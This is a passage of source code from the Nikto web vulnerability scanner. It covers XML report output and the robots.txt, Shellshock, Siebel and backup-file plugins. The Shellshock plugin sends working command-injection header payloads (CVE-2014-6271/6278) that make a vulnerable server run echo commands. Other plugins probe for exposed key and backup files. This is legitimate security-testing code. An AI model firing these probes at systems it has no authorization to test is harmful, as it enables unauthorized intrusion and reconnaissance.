\"$protocol://$hostname:$mark->{'port'}$mark->{'root'}\";\n        $XMLRPT_CURR->{'sitename'} .= '/' unless $XMLRPT_CURR->{'sitename'} =~ /\\/$/;\n    }\n    else {\n        $XMLRPT_CURR->{'sitename'} = 'N/A';\n    }\n\n    push(@$XMLRPT_ALL, $XMLRPT_CURR);\n\n    # Write niktoscan start tag with all required attributes\n    $XML_WRITER->startTag('niktoscan',\n                          hoststest   => $COUNTERS{'hosts_completed'}       || 0,\n                          options     => $CLI{'all_options'}                || '',\n                          version     => $VARIABLES{'version'}              || 'unknown',\n                          scanstart   => localtime($COUNTERS{'scan_start'}) || '',\n                          scanend     => localtime($COUNTERS{'scan_end'})   || '',\n                          scanelapsed => ($COUNTERS{'scan_elapsed'} || 0),\n                          nxmlversion => \"1.2\"\n                          );\n\n    # Write scandetails start tag\n    $XML_WRITER->startTag('scandetails',\n                          targetip       => $mark->{'ip'},\n                          targethostname => $mark->{'hostname'},\n                          targetport     => $mark->{'port'},\n                          targetbanner   => $mark->{'banner'} || '',\n                          starttime      => date_disp($mark->{'start_time'}),\n                          sitename       => $XMLRPT_CURR->{'sitename'},\n                          siteip         => $XMLRPT_CURR->{'siteip'},\n                          hostheader     => $XMLRPT_CURR->{'hostheader'},\n                          errors         => $XMLRPT_CURR->{'errors'},\n                          checks         => $XMLRPT_CURR->{'checks'}\n                          );\n\n    nprint(\"- XML host entry started for $mark->{'hostname'}\", \"v\", \"report_xml\");\n}\n\n###############################################################################\n# write SSL info\nsub xml_ssl_info {\n    my ($handle, $mark) = @_;\n\n    # Extract CN from subject for separate reporting\n    my $cn = '';\n    if ($mark->{'ssl_cert_subject'} =~ /CN=([^$ \\/]+)/) {\n        $cn = $1;\n    }\n\n    # Store SSL info in current host report\n    $XMLRPT_CURR->{'ssl_info'} = { ciphers  => $mark->{'ssl_cipher'},\n                                   issuers  => $mark->{'ssl_cert_issuer'}  || '',\n                                   info     => $mark->{'ssl_cert_subject'} || '',\n                                   cn       => $cn,\n                                   altnames => $mark->{'ssl_cert_altnames'} || ''\n                                   };\n\n    # Write SSL info tag immediately\n    $XML_WRITER->emptyTag('ssl',\n                          ciphers  => $XMLRPT_CURR->{'ssl_info'}->{'ciphers'},\n                          issuers  => $XMLRPT_CURR->{'ssl_info'}->{'issuers'},\n                          info     => $XMLRPT_CURR->{'ssl_info'}->{'info'},\n                          cn       => $XMLRPT_CURR->{'ssl_info'}->{'cn'},\n                          altnames => $XMLRPT_CURR->{'ssl_info'}->{'altnames'}\n                          );\n}\n\n###############################################################################\n# end host entry\nsub xml_host_end {\n    my ($handle, $mark) = @_;\n\n    # Update host data with end time and elapsed time\n    $XMLRPT_CURR->{'endtime'}    = date_disp($mark->{'end_time'});\n    $XMLRPT_CURR->{'elapsed'}    = $mark->{'end_time'} - $mark->{'start_time'};\n    $XMLRPT_CURR->{'itemsfound'} = $mark->{'total_vulns'} || 0;\n\n    # Write statistics\n    $XML_WRITER->emptyTag('statistics',\n                          elapsed     => $XMLRPT_CURR->{'elapsed'},\n                          itemsfound  => $XMLRPT_CURR->{'itemsfound'},\n                          itemstested => $XMLRPT_CURR->{'checks'},\n                          endtime     => $XMLRPT_CURR->{'endtime'}\n                          );\n\n    # Close scandetails and niktoscan tags\n    $XML_WRITER->endTag('scandetails');\n    $XML_WRITER->endTag('niktoscan');\n\n    nprint(\"- XML host entry completed for $mark->{'hostname'}\", \"v\", \"report_xml\");\n}\n\n###############################################################################\n# add item to current host\nsub xml_item {\n    my ($handle, $mark, $item) = @_;\n\n    # Add item to current host's items array\n    push(@{ $XMLRPT_CURR->{'items'} },\n         {  id          => $item->{'nikto_id'},\n            method      => $item->{'method'},\n            description => $item->{'message'},\n            uri         => $item->{'uri'},\n            namelink    => $item->{'namelink'} || '',\n            iplink      => $item->{'iplink'}   || '',\n            references  => $item->{'refs'}     || ''\n            }\n         );\n\n    # Write item tag with proper structure\n    $XML_WRITER->startTag('item',\n                          id     => $item->{'nikto_id'},\n                          method => $item->{'method'}\n                          );\n\n    # Write item content with CDATA for potentially problematic content\n    $XML_WRITER->startTag('description');\n    $XML_WRITER->cdata($item->{'message'});\n    $XML_WRITER->endTag('description');\n\n    $XML_WRITER->startTag('uri');\n    $XML_WRITER->cdata($item->{'uri'});\n    $XML_WRITER->endTag('uri');\n\n    $XML_WRITER->startTag('namelink');\n    $XML_WRITER->cdata($item->{'namelink'} || '');\n    $XML_WRITER->endTag('namelink');\n\n    $XML_WRITER->startTag('iplink');\n    $XML_WRITER->cdata($item->{'iplink'} || '');\n    $XML_WRITER->endTag('iplink');\n\n    $XML_WRITER->startTag('references');\n    $XML_WRITER->cdata($item->{'refs'} || '');\n    $XML_WRITER->endTag('references');\n\n    $XML_WRITER->endTag('item');\n}\n\n###############################################################################\n# close output file\nsub xml_close {\n    my ($handle) = @_;\n\n    # Close root element\n    $XML_WRITER->endTag('niktoscans');\n\n    # End the XML writer\n    $XML_WRITER->end();\n\n    # Close file handle\n    close($XML_HANDLE) if $XML_HANDLE;\n\n    # Validate XML if possible\n    xml_validate_output($handle);\n\n    nprint(\"- XML report completed with proper structure\", \"v\", \"report_xml\");\n}\n\n###############################################################################\n# Validate XML output\nsub xml_validate_output {\n    my ($filename) = @_;\n\n    # Only validate if XML::LibXML is available\n    eval {\n        require XML::LibXML;\n\n        my $parser = XML::LibXML->new();\n        my $doc    = $parser->parse_file($filename);\n\n        # Validate against DTD if available\n        if (defined $CONFIGFILE{'NIKTODTD'} && $CONFIGFILE{'NIKTODTD'} ne '') {\n            $doc->validate();\n            nprint(\"- XML output validated against DTD successfully\", \"v\", \"report_xml\");\n        }\n        else {\n            nprint(\"- XML output is well-formed\", \"v\", \"report_xml\");\n        }\n    };\n    if ($@) {\n        nprint(\"+ WARNING: XML validation failed: $@\", \"e\");\n    }\n}\n\nsub nikto_reports { }    # so core doesn't freak\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_robots.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Check out the robots.txt file\n###############################################################################\nsub nikto_robots_init {\n    my $id = {\n        name        => \"robots\",\n        full_name   => \"Robots\",\n        author      => \"Sullo\",\n        description =>\n          \"Checks whether there's anything within the robots.txt file and analyses it for other paths to pass to other scripts.\",\n        hooks => { recon => { method => \\&nikto_robots,\n                              weight => 49,\n                              },\n                     },\n        copyright => \"2008 Chris Sullo\",\n        options   => { nocheck => \"Flag to disable checking entries in robots file.\", }\n        };\n    return $id;\n}\n\nsub nikto_robots {\n    my ($mark, $parameters) = @_;\n    return if $mark->{'terminate'};\n\n    my ($code, $content, $errors, $request, $response) =\n      nfetch($mark, \"/robots.txt\", \"GET\", \"\", \"\", \"\", \"robots\");\n    my $has_non_root_entries = 1;\n\n    # Validate content-type: should be text/* or not present\n    if (defined($response->{'content-type'})) {\n        if (   $response->{'content-type'} !~ /^text\\//i\n            || $response->{'content-type'} =~ /^text\\/html/i) {\n            return;    # Not a text type, or is HTML - skip processing\n        }\n    }\n\n    # Accept any 2xx success code (except 204 No Content) or custom \"okay\" response\n    if ($code =~ /^2\\d\\d$/) {\n        if (is_404($mark, \"/robots.txt\", $response)) {\n            return;\n        }\n\n        my (%DIRS, %RFILES);\n        my $DISCTR = 0;\n        my @DOC    = split(/\\n/, $content);\n        my $tocheck;\n        foreach my $line (@DOC) {\n            $line =~ s/(?:^\\s+|\\s+$)//g;\n            $line = quotemeta($line);\n            if ($line =~ /allow/i) {\n                chomp($line);\n\n                # Report if Allow\n                $has_non_root_entries = 0 if ($line =~ /^allow/i);\n                $line =~ s/\\#.*$//;\n                $line =~ s/\\s+/ /g;\n                $line =~ s/\\t/ /g;\n                $line =~ s/(?:dis)?allow(?:\\\\:)?(?:\\\\\\s+)?//i;\n                $line =~ s/\\/+/\\//g;\n                $line =~ s/\\\\//g;\n\n                if ($line eq \"\") { next; }\n\n                # try to figure out file vs dir... just guess...\n                if (($line !~ /\\./) && ($line !~ /\\/$/)) { $line .= \"/\"; }\n\n                $line = LW2::uri_normalize($line);\n\n                # figure out dirs/files...\n                my $realdir  = validate_and_fix_regex(LW2::uri_get_dir($line));\n                my $realfile = validate_and_fix_regex($line);\n                $realfile =~ s/^$realdir//;\n\n                nprint(\"- robots.txt entry dir:$realdir -- file:$realfile\",\n                       \"d\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n                if (($realdir ne \"\") && ($realdir ne \"/\")) {\n                    $realdir =~ s/\\\\//g;\n                    $DIRS{$realdir} = 1;\n                }\n                if (($realfile ne \"\") && ($realfile ne \"/\")) {\n                    $realfile =~ s/\\\\//g;\n                    $RFILES{$realfile} = 1;\n                }\n                $DISCTR++;\n\n                if (($realdir ne \"\") && ($realdir ne \"/\")) { $has_non_root_entries = 0; }\n                next\n                  if (   ($realdir eq \"/\" && $realfile eq \"\")\n                      || ($realfile eq \"/\" && $realdir eq \"\"));\n                next if ($line =~ /\\*/);    # Wildcards\n                $tocheck{$line} = 1;\n            }    # end if $line =~ allow\n        }    # end foreach my $line (@DOC)\n\n        # Check for allowed paths\n        foreach my $line (keys %tocheck) {\n            return if $mark->{'terminate'};\n            if (!defined($parameters->{'nocheck'})) {\n                my ($res, $content, $error, $request, $response) =\n                  nfetch($mark, $line, \"GET\", \"\", \"\", \"\", \"Robots: Check for URI\");\n                if (!is_404($mark, $line, $response)\n                    && ($res !~ /^40[346]$/)\n                    && ($res !~ /^30[21]$/)) {\n                    add_vulnerability(\n                        $mark,\n                        \"/robots.txt: Entry '$line' is returned a non-forbidden or redirect HTTP code ($res)\",\n                        999997,\n                        \"https://portswigger.net/kb/issues/00600600_robots-txt-file\",\n                        \"GET\",\n                        \"/$line\",\n                        $request,\n                        $response\n                        );\n                }\n            }\n        }\n\n        # Use shared path matching logic\n        path_matcher(\\%RFILES, \\%DIRS, undef);\n\n        my $msg =\n            ($DISCTR == 1) ? \"contains 1 entry which should be manually viewed.\"\n          : ($DISCTR > 1)  ? \"contains $DISCTR entries which should be manually viewed.\"\n          :   \"retrieved but it does not contain any 'disallow' entries (which is odd).\";\n\n        if ($has_non_root_entries eq 0) {\n            add_vulnerability($mark, \"/robots.txt: $msg\",\n                             999996, \"https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt\",\n                             \"GET\",  \"/robots.txt\", $request, $response);\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_shellshock.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Check for the bash 'shellshock' vulnerability\n###############################################################################\nsub nikto_shellshock_init {\n    my $id = { name        => \"shellshock\",\n               full_name   => \"shellshock\",\n               author      => \"sullo\",\n               description => \"Look for the bash 'shellshock' vulnerability.\",\n               hooks       => { scan => { method => \\&nikto_shellshock, weight => 20 }, },\n               copyright   => \"2014 Chris Sullo\",\n               options     => { uri => \"uri to assess\", },\n               };\n\n    return $id;\n}\n\nsub nikto_shellshock {\n    my ($mark, $parameters) = @_;\n    my ($found, @names,);\n\n    # This would be better coming from live scan results and not db_variables\n    my @files = split(/ /, $VARIABLES{\"\\@SHELLSHOCK\"});\n\n    push(@files, \"\");\n    my %headers;\n    $headers{'User-Agent'} = '() { :; }; echo 93e4r0-cve-2014-6271: true;echo;echo;';\n    $headers{'Referer'}    = '() { _; } >_[$($())] { echo 93e4r0-cve-2014-6278: true; echo;echo; }';\n    my @dirs = split(/ /, $VARIABLES{'@CGIDIRS'});\n    push(@dirs, \"/\");\n\n    #check for FP... error in page\n    my $checkcontent = 1;\n    my ($res, $content, $error, $request, $response) =\n      nfetch($mark, \"/\", \"GET\", \"\", \\%headers, \"\", \"shellshock\");\n    if ($content =~ /93e4r0-cve/) {\n        $checkcontent = 0;\n        nprint(\n              \"Content seems to contain error headers, ignoring content match in shellshock plugin\",\n              \"v\");\n    }\n\n    if (defined $parameters->{'uri'}) {\n\n        # request by hostname\n        my ($res, $content, $error, $request, $response) =\n          nfetch($mark, \"$parameters->{'uri'}\", \"GET\", \"\", \\%headers, \"\", \"shellshock\");\n        if (   ($response->{'93e4r0-cve-2014-6271'} eq 'true')\n            || ($checkcontent && ($content =~ /(?<!echo )93e4r0-cve-2014-6271: true/))) {\n            add_vulnerability(\n                $mark,\n                \"$parameters->{'uri'}: Site appears vulnerable to the 'shellshock' vulnerability).\",\n                999949,\n                \"CVE-2014-6271\",\n                \"GET\",\n                \"$parameters->{'uri'}\",\n                $request,\n                $response\n                );\n        }\n        if (   ($response->{'93e4r0-cve-2014-6278'} eq 'true')\n            || ($checkcontent && ($content =~ /(?<!echo )93e4r0-cve-2014-6278: true/))) {\n            add_vulnerability(\n                 $mark,\n                 \"$parameters->{'uri'}: Site appears vulnerable to the 'shellshock' vulnerability.\",\n                 999948,\n                 \"CVE-2014-6278\",\n                 \"GET\",\n                 \"$parameters->{'uri'}\",\n                 $request,\n                 $response\n                 );\n        }\n    }\n    else {\n        foreach my $cgidir (@dirs) {\n            foreach my $file (@files) {\n                return if $mark->{'terminate'};\n\n                # request by hostname\n                my ($res, $content, $error, $request, $response) =\n                  nfetch($mark, \"$cgidir$file\", \"GET\", \"\", \\%headers, \"\", \"shellshock\");\n                if (   ($response->{'93e4r0-cve-2014-6271'} eq 'true')\n                    || ($checkcontent && ($content =~ /(?<!echo )93e4r0-cve-2014-6271: true/))) {\n                    add_vulnerability(\n                         $mark,\n                         \"$cgidir$file: Site appears vulnerable to the 'shellshock' vulnerability.\",\n                         999947,\n                         \"CVE-2014-6271\",\n                         \"GET\",\n                         \"$cgidir$file\",\n                         $request,\n                         $response\n                         );\n                }\n                if (   ($response->{'93e4r0-cve-2014-6278'} eq 'true')\n                    || ($checkcontent && ($content =~ /(?<!echo )93e4r0-cve-2014-6278: true/))) {\n                    add_vulnerability(\n                         $mark,\n                         \"$cgidir$file: Site appears vulnerable to the 'shellshock' vulnerability.\",\n                         999946,\n                         \"CVE-2014-6278\",\n                         \"GET\",\n                         \"$cgidir$file\",\n                         $request,\n                         $response\n                         );\n                }\n            }\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_siebel.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Siebel specific checks\n###############################################################################\n\nsub nikto_siebel_init {\n    my $id = { name        => \"siebel\",\n               full_name   => \"Siebel Checks\",\n               author      => \"Tautology\",\n               description => \"Performs a set of checks against an installed Siebel application\",\n               hooks       => { scan => { method => \\&nikto_siebel, }, },\n               copyright   => \"2011 Chris Sullo\",\n               options     => {\n                   enumerate => \"Flag to indicate whether we shall attempt to enumerate known apps\",\n                   applications => \"List of applications\",\n                   languages    => \"List of Languages\",\n                   application  => \"Application to attack\",\n                   }\n                 };\n    return $id;\n}\n\nsub nikto_siebel {\n    my ($mark, $parameters) = @_;\n    return if $mark->{'terminate'};\n    my $application;\n\n    # Check whether we have an application\n    if (defined $parameters->{'enumerate'}) {\n        my @apps        = nikto_siebel_enumerate($mark, $parameters);\n        $application = $apps[0];\n    }\n\n    if ($application eq \"\" && defined $parameters->{'application'}) {\n        $application = $parameters->{'application'};\n    }\n\n    if ($application eq \"\") {\n        nprint(\"No Siebel Application defined\", \"v\", \"siebel\");\n        return;\n    }\n\n    # Now we have an application time to perform some tests\n    my $path = $application . \"/base.txt\";\n    my ($res, $content, $error, $request, $response) =\n      nfetch($mark, $path, \"GET\", \"\", \"\", \"\", \"siebel: find default pages\");\n    if ($res eq \"200\") {\n        my ($siebelver, $appver, $hotfix);\n        $siebelver = $content;\n        $siebelver =~ s/([ \\t]*)([0-9.]*)( .*\\n.*)/$2/;\n        chomp($siebelver);\n        $appver = $content;\n        $appver =~ s/(.*\\[)(.*)(\\].*\\n.*)/$2/;\n        chomp($appver);\n        $hotfix = $content;\n        $hotfix =~ s/(.*\\n)(.*HOTFIX )(.*)/$3/;\n        add_vulnerability(\n            $mark,\n            \"$path: Siebel version $siebelver found application version $appver and applied hostfixes are $hotfix\",\n            999901,\n            \"https://www.oracle.com/applications/siebel/\",\n            \"GET\",\n            $path,\n            $request,\n            $response\n            );\n    }\n\n    $path = $application . \"/_stats.swe\";\n    ($res, $content, $error, $request, $response) =\n      nfetch($mark, $path, \"GET\", \"\", \"\", \"\", \"siebel: find default pages\");\n    if ($res eq \"200\") {\n        add_vulnerability(\n                        $mark, \"/_stats.swe: Siebel stats page found\",\n                        999902,\n                        \"https://docs.oracle.com/cd/E14004_01/books/SysDiag/SysDiagSWSEstats7.html\",\n                        \"GET\", $path, $request, $response\n                        );\n    }\n\n    foreach\n      my $page (split(/ /, \"About_Siebel.htm files/ images/ help/ siebstarthelp.htm siebindex.htm\"))\n    {\n        $path = $application . \"/$page\";\n        ($res, $content, $error, $request, $response) =\n          nfetch($mark, $path, \"GET\", \"\", \"\", \"\", \"siebel: find default pages\");\n        if ($res eq \"200\") {\n            add_vulnerability($mark, \"$path: Siebel default file found\",\n                              999903, \"\", \"GET\", $path, $request, $response);\n        }\n    }\n\n    return;\n}\n\nsub nikto_siebel_enumerate {\n    my ($mark, $params) = @_;\n\n    # Default apps and languages - allow parameters to over-ride them.\n    my $apps =\n      \"emarketing ecustomer pmmanager sales marketing wpeserv salesce econsumerpharma emedia epublicsector eaf echannelcme epharmace siaservicece finseenenrollment ecustomercme loyalty erm etraining esales callcenter wpsales eai smc eprofessionalpharma eenergy pseservice sismarketing econsumer medicalce epharma fins finesales finscustomer htim loyaltyscw ermadmin eevents eauctionswexml cra wpserv eai_anon edealer esitesclinical eautomotive econsumersector echannelaf eEnergyOilGasChemicals cgce eclinical finsconsole finsebanking finssalespam htimpim eloyalty ememb pimportal eservice service wppm servicece edealerscw ecommunications ehospitality eretail echannelcg eCommunicationsWireless siasalesce emedical finsechannel finsebrokerage esalescme\";\n    my $langs =\n      \"enu euq cht dan fin deu hun kor ptb sky sve pse cat shl nld fra ell ita nor ptg slv tha psl chs csy frc heb jpn plk rus esn trk\";\n\n    my @foundapps;\n\n    if ($params->{applications}) {\n        $apps = $params->{applications};\n    }\n\n    if ($params->{languages}) {\n        $langs = $params->{languages};\n    }\n\n    foreach my $language (split(/ /, $langs)) {\n        foreach my $application (split(/ /, $apps)) {\n            my $appname   = $application . \"_\" . $language;\n            my $startname = $appname . \"/start.swe\";\n            ($res, $content, $error, $request, $response) =\n              nfetch($mark, $startname, \"GET\", \"\", \"\", \"\", \"Siebel: enumerate application\");\n            if ($res eq \"200\") {\n\n                # We've found an app\n                add_vulnerability($mark, \"$startname: Enumerated Siebel application: \" . $appname,\n                                  999900, \"\", \"GET\", $startname, $request, $response);\n                push(@foundapps, $appname);\n            }\n        }\n    }\n\n    return @foundapps;\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_sitefiles.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Look for interesting files based on site name/ip\n###############################################################################\nsub nikto_sitefiles_init {\n    my $id = { name        => \"sitefiles\",\n               full_name   => \"Site Files\",\n               author      => \"sullo\",\n               description => \"Look for interesting files based on the site's IP/name\",\n               hooks       => { scan => { method => \\&nikto_sitefiles, }, },\n               copyright   => \"2014 Chris Sullo\"\n               };\n\n    return $id;\n}\n\n###############################################################################\n# File type detection functions to reduce false positives\n###############################################################################\n\nsub detect_file_type {\n    my ($content, $uri) = @_;\n    my $first_bytes    = substr($content, 0, 64);    # Check first 64 bytes\n    my $content_length = length($content);\n\n    # Return early for empty content\n    return 'empty' if $content_length == 0;\n\n    # File signatures (Magic Numbers)\n    my %signatures = (\n\n        # Archive formats\n        'zip'  => qr/^PK\\x03\\x04|PK\\x05\\x06|PK\\x07\\x08/,\n        'tar'  => qr/^.{257}ustar|^.{257}ustar\\x00|^.{257}ustar  |^.{257}ustar\\x00\\x00/,\n        'gz'   => qr/^\\x1f\\x8b/,\n        'bz2'  => qr/^BZh/,\n        'lzma' => qr/^\\x5d\\x00\\x00/,\n\n        # Certificate/Key formats\n        'pem' =>\n          qr/^-----BEGIN (CERTIFICATE|RSA PRIVATE KEY|DSA PRIVATE KEY|EC PRIVATE KEY|PRIVATE KEY|PUBLIC KEY)-----/,\n        'jks' => qr/^\\xfe\\xed\\xfe\\xed/,    # Java KeyStore magic\n\n        # Database formats\n        'sql' => qr/^(CREATE|INSERT|UPDATE|DELETE|SELECT|DROP|ALTER|--|\\/\\*|select)/i,\n        );\n\n    # Check signatures\n    foreach my $type (keys %signatures) {\n        if ($first_bytes =~ $signatures{$type}) {\n            return $type;\n        }\n    }\n\n    # Special handling for ZIP-based formats (egg, war) - check BEFORE generic ZIP\n    if ($first_bytes =~ /^PK\\x03\\x04/) {\n        if ($uri =~ /\\.egg$/i) {\n            return 'egg';\n        }\n        if ($uri =~ /\\.war$/i) {\n            return 'war';\n        }\n    }\n\n    # tar detection - check for tar file structure\n    if ($uri =~ /\\.tar$/i) {\n\n        # Tar files have 512-byte blocks, check if content length is multiple of 512\n        if ($content_length % 512 == 0) {\n\n            # Check for null bytes at the end (tar files end with null blocks)\n            my $last_block = substr($content, -512);\n            if ($last_block =~ /^\\x00+$/) {\n                return 'tar';\n            }\n        }\n\n        # Check for tar header structure (first 512 bytes should have specific format)\n        if ($content_length >= 512) {\n            my $header = substr($content, 0, 512);\n\n# Tar header: filename (100 bytes) + mode (8) + uid (8) + gid (8) + size (12) + mtime (12) + checksum (8) + typeflag (1) + linkname (100) + magic (6) + version (2) + uname (32) + gname (32) + devmajor (8) + devminor (8) + prefix (155) + padding (12)\n# Check if it looks like a tar header (has printable filename, reasonable size)\n            my $filename = substr($header, 0, 100);\n            $filename =~ s/\\x00.*$//;    # Remove null padding\n            if ($filename =~ /^[[:print:]]+$/ && length($filename) > 0) {\n                return 'tar';\n            }\n        }\n    }\n\n    # Special case: Check for compressed tar variants\n    if ($uri =~ /\\.(tar\\.gz|tgz)$/i && $first_bytes =~ /^\\x1f\\x8b/) {\n        return 'tar.gz';\n    }\n    if ($uri =~ /\\.(tar\\.bz2)$/i && $first_bytes =~ /^BZh/) {\n        return 'tar.bz2';\n    }\n    if ($uri =~ /\\.(tar\\.lzma)$/i && $first_bytes =~ /^\\x5d\\x00\\x00/) {\n        return 'tar.lzma';\n    }\n\n    # Check for HTML/Text content (negative cases)\n    if ($first_bytes =~ /^<!DOCTYPE|<html|<head|<body|<title/i) {\n        return 'html';\n    }\n\n    # Check for plain text\n    if ($first_bytes =~ /^[[:print:]\\s]+$/ && $content_length < 10000) {\n        return 'text';\n    }\n\n    # Binary detection - check LAST to avoid false positives\n    if ($first_bytes =~ /[\\x00-\\x08\\x0B\\x0C\\x0E-\\x1F\\x7F-\\xFF]{4,}/) {\n        return 'binary';\n    }\n\n    return 'unknown';\n}\n\nsub calculate_entropy {\n    my ($content) = @_;\n\n    my %freq;\n    my $len = length($content);\n    return 0 if $len == 0;\n\n    # Count character frequencies\n    for my $i (0 .. $len - 1) {\n        $freq{ substr($content, $i, 1) }++;\n    }\n\n    # Calculate entropy\n    my $entropy = 0;\n    foreach my $char (keys %freq) {\n        my $p = $freq{$char} / $len;\n        $entropy -= $p * log($p) / log(2);\n    }\n\n    return $entropy;\n}\n\nsub validate_file_content {\n    my ($content, $uri, $expected_type) = @_;\n\n    my $detected_type = detect_file_type($content, $uri);\n\n    # Define what each file type should be\n    my %expected_types = (\n                    'zip'      => [ 'zip',  'binary' ],\n                    'tar'      => [ 'tar',  'binary' ],\n                    'gz'       => [ 'gz',   'binary' ],\n                    'bz2'      => [ 'bz2',  'binary' ],\n                    'lzma'     => [ 'lzma', 'binary' ],\n                    'egg'      => [ 'egg',  'zip', 'binary' ],    # egg files can be detected as zip\n                    'war'      => [ 'war',  'zip', 'binary' ],    # war files can be detected as zip\n                    'pem'      => [ 'pem',  'text' ],\n                    'jks'      => [ 'jks',  'binary' ],\n                    'sql'      => [ 'sql',  'text' ],\n                    'tar.gz'   => [ 'gz',   'binary' ],           # gz signature for tar.gz\n                    'tar.bz2'  => [ 'bz2',  'binary' ],           # bz2 signature for tar.bz2\n                    'tar.lzma' => [ 'lzma', 'binary' ],           # lzma signature for tar.lzma\n                    );\n\n    # Check if detected type matches expected\n    if (exists $expected_types{$expected_type}) {\n        my @valid_types = @{ $expected_types{$expected_type} };\n        foreach my $valid_type (@valid_types) {\n            return 1 if $detected_type eq $valid_type;\n        }\n        return 0;                                     # Mismatch\n    }\n\n    # For unknown expected types, just check it's not HTML\n    return 0 if $detected_type eq 'html';\n    return 1;\n}\n\nsub is_likely_real_file {\n    my ($content, $uri) = @_;\n\n    # Quick size check\n    return 0 if length($content) < 20;\n\n    # Get expected file type from URI\n    my $expected_type = '';\n    if ($uri =~ /\\.(tar\\.gz|tgz)$/i) {\n        $expected_type = 'tar.gz';\n    }\n    elsif ($uri =~ /\\.(tar\\.bz2)$/i) {\n        $expected_type = 'tar.bz2';\n    }\n    elsif ($uri =~ /\\.(tar\\.lzma)$/i) {\n        $expected_type = 'tar.lzma';\n    }\n    elsif ($uri =~ /\\.(zip|tar|gz|bz2|lzma|egg|war|pem|jks|sql)$/i) {\n        $expected_type = lc($1);\n    }\n\n    # If we can't determine expected type, do basic validation\n    if (!$expected_type) {\n        my $detected = detect_file_type($content, $uri);\n        return 0 if $detected eq 'html';    # HTML = likely false positive\n        return 1 if $detected =~ /^(binary|zip|tar|gz|bz2|lzma|egg|war|pem|jks|sql)$/;\n        return 0;\n    }\n\n    # Validate against expected type\n    return validate_file_content($content, $uri, $expected_type);\n}\n\nsub analyze_file_details {\n    my ($content, $uri) = @_;\n\n    my $detected_type  = detect_file_type($content, $uri);\n    my $content_length = length($content);\n    my $entropy        = calculate_entropy($content);\n\n    # Calculate confidence\n    my $confidence = 0;\n\n    # Base confidence on file type\n    $confidence += 90 if $detected_type =~ /^(zip|tar|gz|bz2|lzma|egg|war|jks)$/;\n    $confidence += 85 if $detected_type eq 'pem';\n    $confidence += 80 if $detected_type eq 'sql';\n    $confidence += 70 if $detected_type eq 'binary';\n    $confidence -= 50 if $detected_type eq 'html';                                # Penalty for HTML\n\n    # Size-based adjustments\n    $confidence += 10 if $content_length > 1000;    # Larger files more likely real\n    if ($content_length < 100) {\n\n        # Be more lenient with certain file types - small files are common\n        if ($detected_type eq 'sql') {\n            $confidence -= 10;    # Less penalty for small SQL files\n        }\n        elsif ($detected_type eq 'lzma') {\n            $confidence -= 5;     # Very small penalty for small LZMA files\n        }\n        else {\n            $confidence -= 20;    # Very small files suspicious\n        }\n    }\n\n    # Entropy-based adjustments\n    $confidence += 15 if $entropy > 7.0;    # High entropy = likely binary\n    if ($entropy < 3.0) {\n\n        # Be more lenient with LZMA files for low entropy\n        if ($detected_type eq 'lzma') {\n            $confidence -= 10;    # Less penalty for LZMA with low entropy\n        }\n        else {\n            $confidence -= 20;    # Low entropy = likely text/HTML\n        }\n    }\n\n    # Ensure confidence is between 0-100\n    $confidence = 0   if $confidence < 0;\n    $confidence = 100 if $confidence > 100;\n\n    # Return a simple array instead of hash to avoid construction issues\n    return [ $detected_type, $content_length, $entropy, $confidence ];\n}\n\nsub nikto_sitefiles {\n    my ($mark) = @_;\n    my (%flags, %files, %names);\n\n    # Minimum confidence required to report a file\n    my $confidence_threshold = 60;\n\n    $names{ $mark->{'hostname'} } = 1;\n    $names{ $mark->{'vhost'} }    = 1;\n\n    foreach my $n (keys %names) {\n        my $nn = $n;\n        $nn =~ s/^www(?:\\d+)?\\.//;\n        $names{$nn} = 1;\n        $nn = $n;\n        $nn =~ s/\\./_/g;\n        $names{$nn} = 1;\n        my @bits = split(/\\./, $n);\n        my ($temp1, $temp2) = '';\n\n        for (my $i = 0 ; $i <= $#bits ; $i++) {\n            $names{ $bits[$i] } = 1;\n            $temp1 .= $bits[$i];\n            $temp2 .= '.' . $bits[$i];\n            $temp2 =~ s/^\\.//;\n            $names{$temp1} = 1;\n            $names{$temp2} = 1;\n        }\n    }\n    $names{'backup'}        = 1;\n    $names{'site'}          = 1;\n    $names{'archive'}       = 1;\n    $names{'database'}      = 1;\n    $names{'dump'}          = 1;\n    $names{ $mark->{'ip'} } = 1;\n\n    foreach my $item (keys %names) {\n        next if $item eq '';\n        foreach\n          my $ext (qw/jks cer pem zip tar tar.gz gz tgz tar.bz2 tar.lzma bz2 lzma egg war sql/) {\n            $files{\"$item\\.$ext\"} = 1;\n        }\n    }\n\n    foreach my $f (keys %files) {\n\n        # trickery to test with both host header and without\n        foreach my $flag (0 .. 1) {\n            return if $mark->{'terminate'};\n            my $msg = \"\";\n            $flags{'nohost'} = $flag;\n            if ($flag) {\n                $msg = \"(NOTE: requested by IP address).\";\n            }\n\n            # request. flags passed will determine if hostname is used or not\n            my ($res, $content, $error, $request, $response) =\n              nfetch($mark, \"/$f\", \"GET\", \"\", \"\", \\%flags, \"sitefiles\");\n\n            my $condition1 = defined($response->{'content-type'})\n              && $response->{'content-type'} =~ /^application\\//i;\n            my $condition2 =\n                 ($res == 200)\n              && (length($content) > 0)\n              && (!defined($response->{'content-type'})\n                  || $response->{'content-type'} !~ /^text\\//i)\n              && (!is_404($mark, \"/$f\", $response));\n\n            if ($condition1 || $condition2) {\n\n                # Enhanced content analysis to reduce false positives\n                if (is_likely_real_file($content, \"/$f\")) {\n                    my $analysis = analyze_file_details($content, \"/$f\");\n                    my $conf     = $analysis->[3];\n\n                    # Only report if confidence is high enough\n                    if ($conf > $confidence_threshold) {\n                        my $type_info = \"Confidence: $conf%\";\n                        add_vulnerability(\n                            $mark,\n                            \"/$f: Potentially interesting backup/cert file found. $msg [$type_info]\",\n                            740001,\n                            \"https://cwe.mitre.org/data/definitions/530.html\",\n                            \"HEAD\",\n                            \"/$f\",\n                            $request,\n                            $response\n                            );\n                   